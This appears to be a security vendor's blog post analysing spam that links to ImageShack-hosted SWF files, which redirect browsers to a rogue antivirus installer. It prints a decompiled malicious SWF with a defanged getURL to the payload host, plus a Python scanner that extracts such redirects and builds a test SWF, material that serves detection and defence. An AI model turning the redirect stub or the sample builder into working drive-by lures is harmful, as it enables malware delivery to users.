Spammed SWF URLs Abuse ImageShack, Lead to Rogue AV


We’re seeing a lot of spam right now that uses the now annoyingly familiar “Free Update Windows XP,Vista” template. This time, though, instead of linking to an .EXE file, the link points to an .SWF file.

Figure 1. Seen before: Spam announcing a free update for Windows XP and Vista

The SWF file linked from the large-font text “Free Update Windows XP,Vista” contains Flash ActionScript. One of the SWFs we captured decompiles to the following (http changed to hxxp where it occurs below):

movie '82029540ui0.swf' {
  // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px, compressed

  // unknown tag 777 length 3

  movieClip 5 TextBox {
  }

  frame 2 {
    // the only real payload: redirect the browser window to the hosted executable
    getURL('hxxp://89.xx.49.18/install.exe', '_self');
  }

  frame 3 {
    // halt playback so the movie does not loop back and re-issue the redirect
    stop();
  }
}
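The decompile above shows the whole trick is a single getURL in a DoAction tag. As an added example (not code from the original post), this Python scanner walks an SWF's tag stream, inflating CWS files first, and lists the URL operand of every getURL action in DoAction/DoInitAction tags, so a mail gateway or sandbox can flag an SWF that only exists to redirect. The sample SWF it builds for itself uses a constructed placeholder URL, not the real one.

```python
import struct
import zlib

DO_ACTION, DO_INIT_ACTION = 12, 59          # SWF tag codes that carry AVM1 (ActionScript 1/2) bytecode
ACTION_END, ACTION_GET_URL = 0x00, 0x83     # AVM1 opcodes: end of action list; getURL(url, target)

def swf_tag_stream(data):
    """Return the uncompressed tag stream of an SWF (FWS = plain body, CWS = zlib body after the 8-byte header)."""
    if data[:3] not in (b"FWS", b"CWS"):
        raise ValueError("unsupported SWF signature %r" % data[:3])
    body = data[8:] if data[:3] == b"FWS" else zlib.decompress(data[8:])
    nbits = body[0] >> 3                        # header RECT: 5-bit nbits, then four nbits-wide fields
    return body[(5 + 4 * nbits + 7) // 8 + 4:]  # skip RECT, frame rate (2 bytes) and frame count (2 bytes)

def iter_tags(stream):
    """Yield (code, payload) per tag; a 6-bit length of 0x3F means a 32-bit length follows."""
    pos = 0
    while pos + 2 <= len(stream):               # the End tag (code 0, length 0) is the last thing in the stream
        head = struct.unpack_from("<H", stream, pos)[0]
        code, length, pos = head >> 6, head & 0x3F, pos + 2
        if length == 0x3F:
            length, pos = struct.unpack_from("<I", stream, pos)[0], pos + 4
        yield code, stream[pos:pos + length]
        pos += length

def urls_in_actions(payload):
    """Walk AVM1 action records and collect the URL operand of every getURL."""
    found, pos = [], 0
    while pos < len(payload) and payload[pos] != ACTION_END:
        op, pos = payload[pos], pos + 1
        if op >= 0x80:                          # opcodes below 0x80 carry no operand bytes
            length = struct.unpack_from("<H", payload, pos)[0]
            data, pos = payload[pos + 2:pos + 2 + length], pos + 2 + length
            if op == ACTION_GET_URL:            # operands: url NUL target NUL (target is '_self' in the sample)
                found.append(data[:data.index(b"\x00")].decode("latin-1"))
    return found

def scan_swf(data):
    """Return every getURL target found in DoAction/DoInitAction tags of the given SWF bytes."""
    return [u for code, payload in iter_tags(swf_tag_stream(data))
            if code in (DO_ACTION, DO_INIT_ACTION) for u in urls_in_actions(payload)]

def build_sample_swf(url, compress=False):
    """Constructed test input: a Flash 6 SWF whose only action is getURL(url, '_self')."""
    action = bytes([ACTION_GET_URL]) + struct.pack("<H", len(url) + 7) + url.encode() + b"\x00_self\x00" + bytes([ACTION_END])
    tag = struct.pack("<HI", (DO_ACTION << 6) | 0x3F, len(action)) + action
    body = b"\x00" + struct.pack("<HH", 50 << 8, 1) + tag + b"\x00\x00"  # empty RECT, 50 fps, 1 frame, End tag
    head = (b"CWS" if compress else b"FWS") + bytes([6]) + struct.pack("<I", 8 + len(body))
    return head + (zlib.compress(body) if compress else body)
```

Run `scan_swf(open(path, "rb").read())` on a captured file; any SWF that is nothing but a getURL to an executable is a redirect stub, not a Flash movie.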

This is what it looks like when opened in a browser.

Figure 2. Seen just now: SWF files instead of the typical EXE.

Running install.exe makes the desktop look like this.

Figure 3. Seen before: “WARNING! Spyware detected!”

After this, a EULA window appears, and the system then proceeds to install rogue AV software from avxp-2008.net. Note that this happens automatically from the moment install.exe is run:

Figure 4. Yet another rogue AV product hosted on a fresh domain (this one created August 20).

The technique used in this spam has two things going for it: (1) the use of an SWF instead of an EXE and (2) the use of an ImageShack-hosted file, both of which may suggest to ordinary users that the file is harmless. So it seems the siege of rogue AV is not only not dying down; its proponents are becoming more creative in their “advertising” schemes.

We detect this rogue AV as TROJ_FAKEAV.IG.
